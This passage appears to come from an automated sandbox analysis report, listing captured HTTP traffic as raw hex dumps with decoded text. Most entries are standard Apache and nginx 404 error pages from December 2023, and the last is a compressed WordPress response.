0c 76 0a 0a d4 60 e8 f6 af f1 02 e2 f5 6c f6 4c 1f 09 ea 98 50 5e 63 af 83 02 ed c1 8e 41 f7 fa 89 6a 60 a7 43 37 12 98 5b 79 df 4a 1f e0 cd cf bf 0a 3d 07 b6 85 2d 67 51 06 04 e4 d1 fb 60 a5 0f 9b 96 d6 35 a3 53 de c7 c1 8f d7 c7 5e d9 18 08 59 cf 3a 2a d5 d3 fc 8c c6 d6 d2 78 56 c3 46 de 7d f9 0d 04 31 08 28 51 3d 58 24 42 33 54 64 da 27 a1 7d df 5d 05 b7 07 cd aa 9a 9a e6 f9 7b 6f 07 9f 02 32 68 43 7c dd a9 5e 92 2e 14 7a a1 f5 11 bd 18 b3 e9 f6 01 09 93 85 60 2d 22 eb 5a 84 d1 8b a1 af 9f f8 f0 88 5e 0c 87 51 21 81 de 55 d5 9b 3a 28 84 d1 8b ba 81 55 4d dd 9f ff 00 6b b1 20 8c 26 67 02 a6 10 46 91 8c 12 91 ab c3 a8 51 9b a3 d3 76 40 02 9d 7f 7d fe e5 e5 5b 4f 7f 74 fe f7 f9 17 e7 5f 43 8f 1d 47 f3 e7 f3 2f 2e df 81 cf 7e 75 f9 d6 d3 1f 7d f6 ab a7 3f 02 02 1d a1 1c cd 9f cf bf 78 fa a3 f3 5f e1 f2 9d f3 df ce bf 84 f3 2f 2e ff 0f 76 6d ce 7f bd 7c 07 08 5c fe 7f fe c5 e5 ff 70 fe f1 e5 ff 08 23 87 3e da e2 18 27 d9 fb 86 f7 44 bc 79 74 c2 c8 73 27 5f aa 39 55 85 24 ba cd e4 6f 36 c3 28 48 d7 aa 40 83 4b 71 33 9f 1f 82 3b bc 66 f5 10 64 b4 5a de 52 fd 68 64 50 b2 ea f6 82 bf 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 12:44:41 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 12:44:43 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 12:44:46 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 12:44:49 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:52 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 